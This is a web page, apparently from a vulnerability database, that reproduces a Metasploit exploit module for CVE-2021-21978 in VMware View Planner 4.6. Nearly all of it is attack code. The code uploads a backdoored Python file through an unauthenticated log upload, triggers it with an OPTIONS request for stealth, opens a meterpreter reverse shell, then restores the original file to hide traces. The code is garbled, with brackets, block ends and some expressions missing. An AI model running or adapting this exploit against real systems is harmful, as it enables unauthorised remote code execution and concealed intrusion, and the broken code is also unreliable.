Saturday, March 20, 2021

VMware View Planner 4.6 Remote Code Execution

# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',
'Description' => %q{
This module exploits an unauthenticated log file upload within the file of VMWare View Planner 4.6 prior to 4.6
Security Patch 1.

Successful exploitation will result in RCE as the apache user inside
the appacheServer Docker container.
'Author' => [
'Mikhail Klyuchnikov', # Discovery
'wvu', # Analysis and PoC
'Grant Willcox' # Metasploit Module
'References' => [
['CVE', '2021-21978'],
['URL', ''],
['URL', ''] # wvu's PoC
'DisclosureDate' => '2021-03-02', # Vendor advisory
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'python',
'Targets' => [
'VMware View Planner 4.6.0',
'Arch' => ARCH_PYTHON,
'Type' => :linux_command,
'DefaultOptions' => {
'PAYLOAD' => 'python/meterpreter/reverse_tcp'
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],

Opt::RPORT(443),'TARGETURI', [true, 'Base path', '/'])

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', '')

unless res
return CheckCode::Unknown('Target did not respond to check.')

unless res.code == 200 && !res.body.empty?
return CheckCode::Safe(' file not found at the expected location.')

@original_content = res.body # If the server responded with the contents of, lets save this for later restoration.

if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
return CheckCode::Safe("Target's file has been patched.")

CheckCode::Appears('Vulnerable file identified!')

# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
# As the code for both is the same, minus the content of the file, this is a generic function to handle that.
def upload_file(content)
mime =
mime.add_part(content, 'application/octet-stream', nil, "form-data; name=\"logfile\"; filename=\"#{Rex::Text.rand_text_alpha(20)}\"")
mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":""}', nil, nil, 'form-data; name="logMetaData"')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'logupload'),
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
unless res.to_s.include?('File uploaded successfully.')
fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded successfully!")

def exploit
# Here we want to grab our template file, taken from a clean install but
# with a backdoor section added to it, and then fill in the PAYLOAD placeholder
# with the payload we want to execute.
data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
file_content =, ''))

payload.encoded.gsub!(/"/, '\\"')
file_content['PAYLOAD'] = payload.encoded

# Now that things are primed, upload the file to the target.
print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
print_good('Backdoor uploaded!')

# Use the OPTIONS request to trigger the backdoor. Technically this
# could be any other method including invalid ones like BACKDOOR, but for
# the purposes of stealth lets use a legitimate one.
print_status('Sending request to execute the backdoor!')
'method' => 'OPTIONS',
'uri' => normalize_uri(target_uri.path, 'logupload')
# At this point we should have our shell after waiting a few seconds,
# so lets now restore the original file so we don't leave anything behind.
print_status('Reuploading the original code to remove the backdoor!')
print_good('Original file restored, enjoy the shell!')

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated